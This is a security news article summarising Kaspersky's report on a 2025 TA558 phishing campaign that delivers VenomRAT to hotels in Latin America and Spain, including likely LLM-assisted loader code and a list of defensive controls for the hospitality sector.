Researchers at Kaspersky have identified a new wave of attacks by the cybercrime group known as RevengeHotels (also tracked as TA558) targeting the hospitality sector. The campaign blends polished phishing with JavaScript/PowerShell loaders to deliver VenomRAT, and, notably, shows signs of large language model (LLM)-assisted code generation that improves speed, scale, and evasion.
Who TA558 targets and why hotels remain attractive
Active since at least 2015, TA558 focuses on hotels and travel‑adjacent organizations to harvest payment card data, booking platform credentials, and guest records. Hospitality operations often rely on email-driven workflows and interconnected PMS/POS systems, creating broad attack surface area. Industry reporting, including recurring findings from the Verizon Data Breach Investigations Report, consistently ranks phishing and credential theft among top initial access vectors in services sectors.
2025 campaign overview: regions, techniques, and tooling
The current activity observed in summer 2025 centers on hotels in Brazil, with additional victims in Spanish‑speaking markets such as Argentina, Bolivia, Chile, Costa Rica, Mexico, and Spain. Historically, TA558 has also been seen targeting organizations in Russia, Belarus, Turkey, Malaysia, Italy, and Egypt, indicating broad geographic interest and language agility.
Phishing to JS/PowerShell loaders to VenomRAT
Initial access begins with well-crafted phishing emails posing as invoices, reservation requests, or job applications. Links lead to staged content that pulls a chain of JavaScript and PowerShell downloaders, culminating in installation of VenomRAT. The tradecraft maps to MITRE ATT&CK techniques including T1566 (Phishing), T1204 (User Execution), and T1059 (Command and Scripting Interpreter).
LLM in the infection chain: why AI matters to defenders
Kaspersky’s analysis indicates that portions of the initial compromise scripts and implant delivery routines were likely generated by LLM agents. Automated script creation speeds up phishing page development, tailors loaders to diverse environments, and expedites iterative changes to bypass signature‑based detections. While LLM assistance does not make malware undetectable, it raises attacker throughput and lowers the skill barrier, enabling larger campaigns at similar cost.
What VenomRAT is and how it is used
VenomRAT, a derivative of the open‑source QuasarRAT family, provides remote control of compromised hosts, credential theft, and persistence tooling. Criminal marketplaces continue to distribute VenomRAT, with “lifetime” licenses advertised in the hundreds of US dollars. Despite source code leaks, VenomRAT remains popular due to its features, flexibility, and low operational friction for threat actors.
Business impact: from front desk to finance
Compromised endpoints in front office, reservations, or accounting can expose cardholder data, PMS/checkout credentials, and guests’ personal information. Even large hotel brands face risk if basic controls are missing—especially multi‑factor authentication (MFA), network segmentation between PMS, POS, and guest Wi‑Fi, and least‑privilege administration.
Expert perspective
“The group’s tactics are recognizable, but the tooling is evolving—several malicious components were likely authored with LLMs. It’s a clear example of how AI can accelerate cybercrime. Users and businesses should stay vigilant—even messages that appear to come from trusted brands can be part of a well‑prepared phish,” said Dmitry Galov, Head of Kaspersky GReAT in Russia.
Risk reduction for hotels: practical controls that work
– Harden email security with SPF/DKIM/DMARC, URL and attachment isolation, and sandboxing. Constrain script execution (e.g., PowerShell Constrained Language Mode, AppLocker/WDAC) and disable unnecessary JS/PowerShell where feasible.
– Deploy EDR/XDR with telemetry on script interpreters and block known RAT artifacts; monitor anomalous PowerShell, WMI, and process injection activity.
– Enforce MFA on PMS, payment gateways, and remote access; segment POS, PMS, back office, and guest networks to limit lateral movement.
– Minimize card data storage, adopt tokenization, and maintain PCI DSS compliance with regular assessments and logging.
– Run ongoing phishing awareness training and realistic attack simulations for reservations, front‑desk, and finance teams.
TA558’s latest campaign underscores a durable reality: proven phishing tactics paired with AI‑accelerated development can rapidly compromise hotel operations and monetize guest data. Hotels and travel providers should assume persistent targeting and close foundational gaps—email hygiene, script control, EDR/XDR, MFA, and segmentation—while rehearsing incident response. Organizations that reduce attack surface and speed detection will significantly raise the cost of exploitation for threat actors.
